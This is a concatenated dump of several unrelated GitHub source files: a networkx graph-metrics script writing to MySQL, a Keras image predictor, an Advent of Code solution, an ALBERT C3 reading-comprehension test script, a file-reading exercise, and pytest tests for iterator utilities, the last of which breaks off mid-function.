fuck1['position']='right'\r\n fuck1['color']= \"rgba(255, 255, 255, 1)\"\r\n fuck1['backgroundColor']= \"rgba(0, 0, 0, 0.7)\"\r\n fuck1['fontSize']= \"14\"\r\n fuck1['padding']= 5\r\n fuck1['borderRadius']= 10\r\n fuck2['label']=fuck1\r\n last_strtojson['series'][0]['nodes'][i]['emphasis']=fuck2\r\n\r\n return jsonify(avg_degree=last_avgdegree,avg_path=last_avgpath,avg_cluster=last_avgcluster,json_str=last_strtojson,histogramtostr=last_histogram)\r\n\r\n\r\n\r\ndef WRnode(gene):\r\n \r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n cur.execute('select * from jsondata where generation=%d' %gene)\r\n mydata = cur.fetchall()\r\n mydata = mydata[0][1]\r\n mydata = json.loads(mydata)\r\n G = json_graph.node_link_graph(mydata)\r\n\r\n num_node=G.number_of_nodes()\r\n \r\n bc=nx.betweenness_centrality(G)\r\n cc=nx.closeness_centrality(G)\r\n try:\r\n ec=nx.eigenvector_centrality(G,max_iter=1000)\r\n except:\r\n ec={}\r\n for i in range(num_node):\r\n ec[i]=0\r\n print('bbbbbug')\r\n print(gene)\r\n \r\n kc=nx.katz_centrality(G)\r\n\r\n \r\n for n in range(G.number_of_nodes()):\r\n node_id=n\r\n id_degree=G.degree(n)\r\n id_betweeness=bc[n]\r\n id_closeness=cc[n]\r\n id_eigenvector=ec[n]\r\n id_katz=kc[n]\r\n\r\n id_cluster= nx.clustering(G,n)\r\n id_triangle= nx.triangles(G,n)\r\n tsql = \"insert into nodedata(generation,nodeid,degree,betweeness,closeness,eigenvector,katz,cluster,triangle) values(%d,%d,%d,%f,%f,%f,%f,%f,%d)\"%(gene,node_id,id_degree,id_betweeness,id_closeness,id_eigenvector,id_katz,id_cluster,id_triangle)\r\n cur.execute(tsql)\r\n\r\n conn.commit()","repo_name":"minyuehe/Software_curriculum_design","sub_path":"network/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"19080533716","text":"\nfrom keras.models import load_model\nimport numpy as np\nfrom PIL import Image\n\nmodel = load_model('src/image_detection/Furry-Detection-Model')\n\ndef predict(img : Image) -> str:\n img = img.resize((300, 300))\n img = img.convert(\"RGB\")\n img_arr = np.array(img)\n\n x = np.array([img_arr])/255\n pred = model.predict(x)\n \n max_index = np.argmax(pred[0])\n \n return max_index\n","repo_name":"Mikask1/Rara-chan","sub_path":"src/image_detection/image_detection_module.py","file_name":"image_detection_module.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"23983860344","text":"import os.path\n\n#input_file = os.path.dirname(os.path.realpath(__file__)) + \"/ExampleData.txt\"\ninput_file = os.path.dirname(os.path.realpath(__file__)) + \"/MyDataSet.txt\"\n\nwith open(input_file) as data_set:\n elf_no = 0\n calories = [0]\n\n # Iterate over files\n for line in data_set:\n if line != \"\\n\":\n calories[elf_no] = calories[elf_no] + int(line)\n else:\n # \\n means next elf\n calories.append(0)\n elf_no = elf_no + 1\n\n print(\"Max calories (Answer of Part 1): \", max(calories))\n\n # Answer of part 2\n calories.sort(reverse=True)\n print(\"Max 3 calories: \", calories[0], calories[1], calories[2])\n print(\"And the sum is: \", sum(calories[0:3]))\n\n\n","repo_name":"zimtschge/AdventOfCode2022","sub_path":"Day01/calory_check.py","file_name":"calory_check.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18077214829","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport csv\nimport json\nimport logging\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch\nfrom google_albert_pytorch_modeling import AlbertConfig, AlbertForMultipleChoice\nfrom pytorch_modeling import BertConfig, BertForMultipleChoice, ALBertConfig, ALBertForMultipleChoice\nfrom tools import official_tokenization as tokenization\nfrom tools import utils\nfrom tools.pytorch_optimization import get_optimization, warmup_linear\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm\n\nn_class = 4\nreverse_order = False\nsa_step = False\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n def __init__(self, guid, text_a, text_b=None, text_c=None):\n \"\"\"Constructs a InputExample.\n Args:\n guid: Unique id for the example.\n text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text_a = text_a\n self.text_b = text_b\n self.text_c = text_c\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, input_ids, input_mask, segment_ids):\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for sequence classification data sets.\"\"\"\n\n def get_train_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_dev_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _read_tsv(cls, input_file, quotechar=None):\n \"\"\"Reads a tab separated value file.\"\"\"\n with open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines\n\n\nclass c3Processor(DataProcessor):\n def __init__(self, data_dir):\n self.D = []\n self.data_dir = data_dir\n\n data = []\n with open(os.path.join(self.data_dir , \"d-test.json\"),\"r\", encoding=\"utf8\") as f:\n data += json.load(f)\n\n for i in range(len(data)):\n for j in range(len(data[i][1])):\n d = ['\\n'.join(data[i][0]).lower(), data[i][1][j][\"question\"].lower()]\n for k in range(len(data[i][1][j][\"choice\"])):\n d += [data[i][1][j][\"choice\"][k].lower()]\n for k in range(len(data[i][1][j][\"choice\"]), 4):\n d += ['无效答案'] # 有些C3数据选项不足4个,添加[无效答案]能够有效增强模型收敛稳定性\n self.D += [d]\n\n def get_test_examples(self):\n \"\"\"See base class.\"\"\"\n return self._create_examples(self.D, \"test\")\n\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\", \"2\", \"3\"]\n\n def _create_examples(self, data, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n cache_dir = os.path.join(self.data_dir, set_type + '_examples.pkl')\n if os.path.exists(cache_dir):\n examples = pickle.load(open(cache_dir, 'rb'))\n else:\n examples = []\n for (i, d) in enumerate(data):\n\n for k in range(4):\n guid = \"%s-%s-%s\" % (set_type, i, k)\n text_a = tokenization.convert_to_unicode(data[i][0])\n text_b = tokenization.convert_to_unicode(data[i][k + 2])\n text_c = tokenization.convert_to_unicode(data[i][1])\n examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, text_c=text_c))\n\n with open(cache_dir, 'wb') as w:\n pickle.dump(examples, w)\n print(\"example length: \",len(examples))\n return examples\n\n\ndef convert_examples_to_features(examples, max_seq_length, tokenizer):\n \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n #features就是tokenid、mask等,尚未embedding\n\n\n features = [[]]#二维数组\n for (ex_index, example) in enumerate(tqdm(examples)):\n tokens_a = tokenizer.tokenize(example.text_a)\n\n tokens_b = tokenizer.tokenize(example.text_b)\n\n tokens_c = tokenizer.tokenize(example.text_c)\n\n _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)\n tokens_b = tokens_c + [\"[SEP]\"] + tokens_b\n\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n for token in tokens_a:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n if tokens_b:\n for token in tokens_b:\n tokens.append(token)\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n\n if ex_index < 5:\n logger.info(\"*** Example ***\")\n logger.info(\"guid: %s\" % (example.guid))\n logger.info(\"tokens: %s\" % \" \".join(\n [tokenization.printable_text(x) for x in tokens]))\n logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n logger.info(\"input_mask: %s\" % \" \".join([str(x) for x in input_mask]))\n logger.info(\n \"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n #TODO: 看features的结构,改bat\n features[-1].append(\n InputFeatures(\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids))\n if len(features[-1]) == n_class:\n features.append([])\n\n if len(features[-1]) == 0:\n features = features[:-1]\n return features\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_length):\n \"\"\"Truncates a sequence tuple in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b) + len(tokens_c)\n if total_length <= max_length:\n break\n if len(tokens_a) >= len(tokens_b) and len(tokens_a) >= len(tokens_c):\n tokens_a.pop()\n elif len(tokens_b) >= len(tokens_a) and len(tokens_b) >= len(tokens_c):\n tokens_b.pop()\n else:\n tokens_c.pop()\n\n\ndef accuracy(out, labels):\n outputs = np.argmax(out, axis=1)\n return np.sum(outputs == labels)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--gpu_ids\",\n default='0',\n type=str,\n required=True)\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--task_name\",\n default='c3',\n type=str,\n required=True)\n parser.add_argument(\"--bert_config_file\",\n default=None,\n type=str,\n required=True,\n help=\"The config json file corresponding to the pre-trained BERT model. \\n\"\n \"This specifies the model architecture.\")\n parser.add_argument(\"--vocab_file\",\n default=None,\n type=str,\n required=True,\n help=\"The vocabulary file that the BERT model was trained on.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--init_checkpoint\",\n default='check_points/pretrain_models/albert_xxlarge_google_zh_v1121/pytorch_model.pth',\n type=str,\n help=\"Initial checkpoint (usually from a pre-trained BERT model).\")\n parser.add_argument(\"--do_lower_case\",\n default=True,\n action='store_true',\n help=\"Whether to lower case the input text. True for uncased models, False for cased models.\")\n parser.add_argument(\"--max_seq_length\",\n default=512,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_test\",\n default=True,\n action='store_true',\n help=\"Whether to run test on the test set.\")\n parser.add_argument(\"--test_batch_size\",\n default=16,\n type=int,\n help=\"Total batch size for test.\")\n parser.add_argument(\"--schedule\",\n default='warmup_linear',\n type=str,\n help='schedule')\n parser.add_argument(\"--no_cuda\",\n default=False,\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument('--float16',\n action='store_true',\n default=False)\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--seed',\n type=int,\n default=422,\n help=\"random seed for initialization\")\n parser.add_argument('--setting_file', type=str, default='setting.txt')\n parser.add_argument('--log_file', type=str, default='log.txt')\n\n args = parser.parse_args()\n args.setting_file = os.path.join(args.output_dir, args.setting_file)\n args.log_file = os.path.join(args.output_dir, args.log_file)\n os.makedirs(args.output_dir, exist_ok=True)\n with open(args.setting_file, 'wt') as opt_file:\n opt_file.write('------------ Options -------------\\n')\n print('------------ Options -------------')\n for k in args.__dict__:\n v = args.__dict__[k]\n opt_file.write('%s: %s\\n' % (str(k), str(v)))\n print('%s: %s' % (str(k), str(v)))\n opt_file.write('-------------- End ----------------\\n')\n print('------------ End -------------')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_ids\n\n if os.path.exists(args.log_file):\n os.remove(args.log_file)\n\n if args.local_rank == -1 or args.no_cuda:\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n n_gpu = torch.cuda.device_count()\n else:\n device = torch.device(\"cuda\", args.local_rank)\n n_gpu = 1\n # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.distributed.init_process_group(backend='nccl')\n logger.info(\"device %s n_gpu %d distributed training %r\", device, n_gpu, bool(args.local_rank != -1))\n\n\n\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n processor = c3Processor(args.data_dir)\n label_list = processor.get_labels()\n\n tokenizer = tokenization.BertTokenizer(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)\n\n\n if 'albert' in args.bert_config_file:\n if 'google' in args.bert_config_file:\n bert_config = AlbertConfig.from_json_file(args.bert_config_file)\n model = AlbertForMultipleChoice(bert_config, num_choices=n_class)\n else:\n bert_config = ALBertConfig.from_json_file(args.bert_config_file)\n model = ALBertForMultipleChoice(bert_config, num_choices=n_class)\n else:\n bert_config = BertConfig.from_json_file(args.bert_config_file)\n model = BertForMultipleChoice(bert_config, num_choices=n_class)\n\n if args.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\n \"Cannot use sequence length {} because the BERT model was only trained up to sequence length {}\".format(\n args.max_seq_length, bert_config.max_position_embeddings))\n\n if args.init_checkpoint is not None:\n utils.torch_show_all_params(model)\n utils.torch_init_model(model, args.init_checkpoint)\n if args.float16:\n model.half()\n model.to(device)\n\n if args.local_rank != -1:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],\n output_device=args.local_rank)\n #elif n_gpu > 1:\n else:\n model = torch.nn.DataParallel(model)\n\n #load model params\n model.load_state_dict(torch.load(os.path.join(args.output_dir, \"model.pt\")),strict=False)\n\n test_dataloader = None\n if args.do_test:\n test_examples = processor.get_test_examples()\n feature_dir = os.path.join(args.data_dir, 'test_features{}.pkl'.format(args.max_seq_length))\n if os.path.exists(feature_dir):\n test_features = pickle.load(open(feature_dir, 'rb'))\n else:\n test_features = convert_examples_to_features(test_examples, args.max_seq_length, tokenizer)\n with open(feature_dir, 'wb') as w:\n pickle.dump(test_features, w)\n input_ids = []\n input_mask = []\n segment_ids = []\n\n\n for f in test_features:\n input_ids.append([])\n input_mask.append([])\n segment_ids.append([])\n for i in range(n_class):\n input_ids[-1].append(f[i].input_ids)\n input_mask[-1].append(f[i].input_mask)\n segment_ids[-1].append(f[i].segment_ids)\n\n\n all_input_ids = torch.tensor(input_ids, dtype=torch.long)\n all_input_mask = torch.tensor(input_mask, dtype=torch.long)\n all_segment_ids = torch.tensor(segment_ids, dtype=torch.long)\n\n\n test_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids)\n if args.local_rank == -1:\n test_sampler = SequentialSampler(test_data)\n else:\n test_sampler = DistributedSampler(test_data)\n test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.test_batch_size)\n\n logger.info(\"***** Running test phase *****\")\n logger.info(\" Num examples = %d\", len(test_examples))\n logger.info(\" Batch size = %d\", args.test_batch_size)\n\n model.eval()\n test_loss, test_accuracy = 0, 0\n nb_test_steps, nb_test_examples = 0, 0\n logits_all = []\n for input_ids, input_mask, segment_ids in tqdm(test_dataloader):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n\n with torch.no_grad():\n reshaped_logits = model(input_ids, segment_ids, input_mask, return_logits=True)\n\n logits = reshaped_logits.detach().cpu().numpy()\n for i in range(len(logits)):\n logits_all += [logits[i]]\n\n\n\n nb_test_examples += input_ids.size(0)\n nb_test_steps += 1\n logger.info(\"***** Test results *****\")\n output_test_file = os.path.join(args.output_dir, \"results_test.txt\")\n\n with open(output_test_file, \"w\") as f:\n for i in range(len(logits_all)):\n for j in range(len(logits_all[i])):\n f.write(str(logits_all[i][j]))\n if j == len(logits_all[i]) - 1:\n f.write(\"\\n\")\n else:\n f.write(\" \")\n f.close()\n\n # the test submission order can't be changed\n submission_test = os.path.join(args.output_dir, \"%s_predict.json\" %(args.task_name))\n g=json.load(open(r'./mrc_data/c3/d-test.json','r',encoding='utf-8'))\n idlst=[]\n for i in range(len(g)):\n for j in range(len(g[i][1])):\n idlst.append(g[i][1][j]['id'])\n g.close()\n test_preds = [int(np.argmax(logits_)) for logits_ in logits_all]\n assert len(idlst)==len(test_preds)\n\n with open(submission_test, \"w\") as f:\n for l in range(len(idlst)):\n dic={'id':idlst[l], 'label':test_preds[l]}\n f.write(json.dumps(dic)+'\\n')\n f.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"insomnia1996/mrc_c3","sub_path":"test_c3.py","file_name":"test_c3.py","file_ext":"py","file_size_in_byte":19515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42340743305","text":"#!/usr/bin/python3\n\"\"\"\nFunction that read a text file\n\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\"\n Function that reads n lines of a text file\n\n Args:\n filename: name of the file\n nb_lines: number of lines to read\n \"\"\"\n tlines = 0\n with open(filename, encoding='utf-8') as a_file:\n for line in a_file:\n tlines += 1\n\n with open(filename, encoding='utf-8') as a_file:\n if nb_lines <= 0 or nb_lines >= tlines:\n print(a_file.read(), end='')\n else:\n for line in range(nb_lines):\n print(a_file.readline(), end='')\n","repo_name":"jaarmore/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25732753079","text":"import random\nfrom itertools import tee\n\nimport pytest\n\nfrom caldera.utils import functional as F\n\n\ndef randint(a, b, n=None):\n if n is None:\n return random.randint(a, b)\n else:\n return [random.randint(a, b) for _ in range(n)]\n\n\ndef validate_generator(generator, expected):\n # assert inspect.isgenerator(generator) or inspect.isgeneratorfunction(generator)\n\n result_generator, result_generator2 = tee(generator)\n expected_generator, expected_generator2 = tee(expected)\n print()\n print(\"Result: \" + str(list(result_generator2)))\n print(\"Expected: \" + str(list(expected_generator2)))\n ith = 0\n for _result, _expected in zip(result_generator, expected_generator):\n assert _result == _expected\n ith += 1\n\n with pytest.raises(StopIteration):\n next(result_generator), \"There were values remaining in `result`\"\n with pytest.raises(StopIteration):\n next(expected_generator), \"There were values remaining in `expected` generator\"\n\n\nclass TestParametrizedBasic:\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.group_each_into_chunks,\n (3,),\n {},\n [1, 2, 3, 4],\n [[1, 2, 3], [4]],\n ),\n (F.group_each_into_chunks, (4,), {}, [1, 2, 3, 4], [[1, 2, 3, 4]]),\n (F.group_each_into_chunks, (5,), {}, [1, 2, 3, 4], [[1, 2, 3, 4]]),\n (\n F.group_each_into_chunks,\n (1,),\n {},\n [1, 2, 3, 4],\n [[1], [2], [3], [4]],\n ),\n (\n F.group_each_into_chunks,\n (3,),\n {},\n range(10),\n [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]],\n ),\n ],\n )\n def test_chunks(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.filter_each,\n (lambda x: x >= 3,),\n {},\n range(10),\n list(range(3, 10)),\n ),\n (\n F.filter_each,\n (lambda x: x >= 3,),\n {\"inverse\": True},\n range(10),\n list(range(3)),\n ),\n (F.filter_each, (lambda x: x == 30,), {}, range(10), []),\n ],\n )\n def test_filter_each(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.ignore_each_until,\n (lambda x: x == 1,),\n {},\n [10, 2, 1, 2, 3, 1, 4, 2],\n [1, 2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_ignore_until(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.iter_each_until,\n (lambda x: x == 1,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3],\n ),\n ],\n )\n def test_iter_each_until(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.ignore_each_count,\n (4,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_ignore_each_count(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.iter_count,\n (4,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1],\n ),\n (\n F.iter_count,\n (40,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_iter_count(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n # @pytest.mark.parametrize(\"n\", [0, 1, 10, 30])\n # def test_iter_count_has_remaining(self, n):\n # data = randint(1, 10, 100)\n # data_gen = iter(data)\n # result = F.iter_count(n)(data)\n # print(data)\n # validate_generator(result, data[:n])\n # validate_generator(data_gen, data[n:])\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.iter_step,\n (1,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::1],\n ),\n (\n F.iter_step,\n (3,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::3],\n ),\n (\n F.iter_step,\n (20,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::20],\n ),\n ],\n )\n def test_step(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.group_each_consecutive,\n (lambda x: x % 2,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2, 1],\n [[10, 2], [3, 1], [2], [3, 1], [4, 2], [1]],\n )\n ],\n )\n def test_group_each_consecutive(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n\nclass TestWithRandomData:\n def test_enumerate_each(self):\n data = randint(1, 1000, 100)\n f = F.enumerate_each()\n result = f(iter(data))\n result = f(iter(data))\n validate_generator(result, enumerate(data))\n\n def test_enumerate_each_2(self):\n data = randint(1, 1000, 3)\n f = F.enumerate_each()\n list(f(iter(data)))\n result = f(iter(data))\n result = f(iter(data))\n validate_generator(result, enumerate(data))\n\n def test_side_effect(self):\n data = randint(1, 1000, 100)\n\n arr = []\n\n def my_side_effect(a):\n print(a)\n if a < 100:\n arr.append(a)\n\n f = F.apply_each(my_side_effect)\n result = f(iter(data))\n validate_generator(result, data)\n assert arr == [d for d in data if d < 100]\n\n def test_index_each(self):\n data = iter([[1, 2, 3], [20, 30]])\n f = F.index_each(0)\n assert list(f(data)) == [1, 20]\n\n def test_cat(self):\n data1 = randint(1, 10, 100)\n data2 = randint(1, 10, 100)\n\n f = F.cat(iter(data2))\n\n result = f(iter(data1))\n print(result)\n assert list(next(result)) == data1\n assert list(next(result)) == data2\n\n result = f(iter(data1))\n assert list(next(result)) == data1\n assert list(next(result)) == data2\n\n def test_repeat(self):\n data = iter(range(10))\n f = F.repeat_all(3)\n result = f(data)\n assert list(result) == list(range(10)) * 3\n\n @pytest.mark.parametrize(\"n\", [0, 1, 50])\n def test_iter_count(self, n):\n data = randint(1, 1000, 50)\n f = F.iter_count(n)\n result = list(f(iter(data)))\n assert len(result) == n\n assert result == data[:n]\n\n def test_repeat_forever(self):\n data = iter(range(10))\n f = F.compose(F.repeat_all(10), F.iter_count(12))\n result = f(data)\n assert list(result) == (list(range(10)) * 2)[:12]\n\n def test_pairwise_each(self):\n data = randint(1, 1000, 100)\n expected = zip(data, data[1:])\n result = F.pairwise_each()(iter(data))\n validate_generator(result, expected)\n\n def test_yield_all(self):\n data = randint(1, 1000, 100)\n result = F.yield_all()(iter(data))\n validate_generator(next(result), data)\n with pytest.raises(StopIteration):\n next(result)\n\n def test_yield_all_with_func(self):\n def foo(arr):\n yield from range(10)\n\n data = randint(1, 1000, 100)\n result = F.yield_all(foo)(iter(data))\n validate_generator(next(result), range(10))\n\n @pytest.mark.parametrize(\"n\", [0, 1, 3, 10])\n def test_tee_all(self, n):\n data = randint(1, 1000, 100)\n result = F.tee_all(n)(iter(data))\n for _ in range(n):\n validate_generator(next(result), iter(data))\n with pytest.raises(StopIteration):\n next(result)\n\n def test_get_each(self):\n data = randint(1, 1000, 100)\n kv = [{\"x\": x} for x in data]\n result = F.get_each(\"x\")(iter(kv))\n validate_generator(result, data)\n\n def test_get_each_with_default(self):\n data = randint(1, 1000, 100)\n kv = [{\"x\": x} for x in data]\n result = F.get_each(\"k\", default=123)(iter(kv))\n validate_generator(result, [123] * len(data))\n\n def test_iter_next(self):\n data = randint(1, 1000, 10)\n result = F.iter_next()(iter(data))\n validate_generator(result, data[:1])\n\n def test_group_each_until(self):\n\n data = randint(1, 1000, 100)\n\n f = F.group_each_until(lambda x: len(x) > 5, lambda x: x < 100)\n\n result = f(iter(data))\n i = 0\n for chunk in result:\n assert all([x < 100 for x in chunk])\n assert len(chunk) <= 6\n i += len(chunk)\n\n def test_iter_each_unique(self):\n data = randint(1, 100, 1000)\n f = F.iter_each_unique()\n result = f(iter(data))\n validate_generator(iter(sorted(result)), iter(sorted(set(data))))\n\n def test_iter_each_reverse(self):\n data = randint(1, 100, 1000)\n f = F.iter_reverse()\n result = f(iter(data))\n validate_generator(result, data[::-1])\n\n def test_zip_each_with(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n f = F.zip_each_with(data2, data3)\n result = f(iter(data))\n validate_generator(result, zip(data2, data3, data))\n\n # ensure result can be obtained again...\n result = f(iter(data))\n validate_generator(result, zip(data2, data3, data))\n\n def test_zip_each_with_first(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n f = F.zip_each_with(data2, data3, first=True)\n result = f(data)\n validate_generator(result, zip(data, data2, data3))\n\n def test_zipmap_with_each(self):\n data = [0, 10, 3]\n f = F.zipmap_each_with(\n lambda x: x + 1,\n lambda x: x * 2,\n lambda x: x * 3,\n )\n result = f(iter(data))\n assert list(result) == [1, 20, 9]\n\n def test_reduce_each(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n data4 = zip(data, data2, data3)\n expected = [i + (i + 1000) + (i + 3000) for i in data]\n result = F.reduce_each(lambda a, b: a + b)(iter(data4))\n validate_generator(result, expected)\n\n\nclass TestComplexFunctions:\n def test_fn_tee_zip_reduce(self):\n data = iter(range(10))\n\n piped = F.compose(\n F.tee_all(),\n F.zip_all(),\n F.reduce_all(lambda a, b: a + b),\n )\n\n print(list(piped(data)))\n\n def 